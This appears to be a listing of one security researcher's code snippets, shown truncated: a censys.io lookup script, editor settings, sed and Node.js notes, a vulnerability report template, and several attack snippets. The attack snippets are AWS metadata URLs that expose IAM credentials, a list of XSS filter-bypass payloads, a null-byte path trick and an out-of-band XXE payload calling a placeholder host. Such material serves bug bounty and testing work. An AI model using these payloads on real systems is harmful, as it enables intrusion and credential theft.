bl4de

#!/usr/bin/python
# Replace the UID and SECRET variables with your own API keys from censys.io

import sys
import json
import requests

if len(sys.argv) < 2:
    print "usage " + sys.argv[0]+" <domain>";
    sys.exit();

bl4de

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

bl4de

Better local require() paths for Node.js

Problem

When the directory structure of your Node.js application (not library!) has some depth, you end up with a lot of annoying relative paths in your require calls like:

var Article = require('../../../models/article');

Those suck for maintenance and they're ugly.

Possible solutions

bl4de

var filename = "/var/www/index.html"
var path = filename + ".log"

console.log(path)  // /var/www/index.html.log



filename = "/var/www/index.html\x00\x0a"
path = filename + ".log"

bl4de

// Place your settings in this file to overwrite the default settings
{
  "editor.fontFamily": "monospace, 'Droid Sans Fallback'",
  // Controls if the minimap is shown
  "editor.minimap.enabled": true,
  "explorer.autoReveal": false,
  "extensions.autoUpdate": true,
  "editor.renderIndentGuides": false,
  "editor.rulers": [
    80,

bl4de

There is [VULNERABILITY] in [MODULE]
It allows [WHAT IT ALLOWS - EG. READ ARBITRARY FILES, READ DATA FROM DATABASE ETC.]

## Module

**[MODULE NAME]**

[DESCRIPTION - JUST FOR REFERENCE; COPIED FROM NPM MODULE PAGE]

https://www.npmjs.com/package/[MODULE NAME]

bl4de

Sed

- delimiters

s///
s:::
s___

Anything can be used as delimiter as long as it's not in the text itself

bl4de

[Running] node sleepsort.js
[ 25.647108284347908,
  40.159794177756055,
  53.365567944345436,
  57.6989473257401,
  58.212985122747526,
  61.272387891387005,
  65.97137345057268,
  74.3321457018622,

bl4de

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

bl4de

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>